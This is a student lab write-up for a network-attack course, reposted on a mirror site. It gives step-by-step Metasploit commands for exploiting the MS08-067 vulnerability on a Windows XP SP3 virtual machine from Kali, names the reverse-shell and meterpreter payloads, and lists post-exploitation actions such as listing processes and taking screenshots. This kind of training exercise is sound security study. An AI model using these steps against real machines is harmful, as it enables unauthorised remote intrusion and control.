zoukankan      html  css  js  c++  java
  • 20145329 《网络对抗技术》MS08_067远程漏洞攻击

    MS08_067远程漏洞攻击:shell

    实现攻击的前提是:攻击机和靶机在同一个网段下,首先将kali的ip改为与winxp的ip一样,二者能ping通

    两台虚拟机:
    kali ip:192.168.10.129
    windows xp sp3:192.168.10.128

    • 1.kali打开msfconsole控制台

    • 2.在msf模式下查找ms08_067的漏洞攻击程序

    • 3."use exploit/windows/smb/ms08_067_netapi"进入该漏洞模块

    • 4."show payload"显示有效的攻击载荷,可以自选,以下使用generic/shell_reverse_tcp。

    • 5."show targets"查看可以被攻击的靶机的操作系统型号

    • 6.设置攻击有效载荷:set payload generic/shell_reverse_tcp

    • 7.“show options“查看需要需要设置的数据

    • 8.设置主机和靶机的ip和端口为下图所示

    • 9.exploit开始攻击

    • 10.获取靶机shell进行操作,与靶机本机操作结果一样

    MS08_067远程漏洞攻击:meterpreter

    • 1.基础设置如以上步骤一样,设置攻击载荷时改为使用meterpreter


    • 2.运行exploit进行攻击

    • 3.”ifconfig“查看靶机地址

    • 4.“ps”查看进程

    • 5.对靶机进行截屏

    • 6.使用shell

  • 相关阅读:
    DHCP服务器
    继承、抽象、多态
    范围随机数Random
    阿里、北理工、清华以及华为的镜像站
    创建kafka生产对象
    kafka消费者的配置
    Kafka 流数据 SQL 引擎 -- KSQL
    认证maven工程
    基础算法
    Java基础
  • 原文地址:https://www.cnblogs.com/jdy1453/p/6719676.html
Copyright © 2011-2022 走看看